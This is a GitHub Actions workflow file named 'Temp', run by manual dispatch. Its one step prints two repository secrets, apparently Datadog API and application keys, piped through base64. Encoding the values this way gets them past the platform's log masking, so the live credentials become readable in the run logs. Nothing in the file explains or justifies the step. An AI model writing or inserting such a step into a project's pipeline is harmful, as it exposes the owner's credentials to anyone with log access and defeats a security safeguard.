name: Temp

on:
  workflow_dispatch:

jobs:
  temp:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "${{ secrets.DD_API_KEY }}" | base64
          echo "${{ secrets.DD_APP_KEY }}" | base64
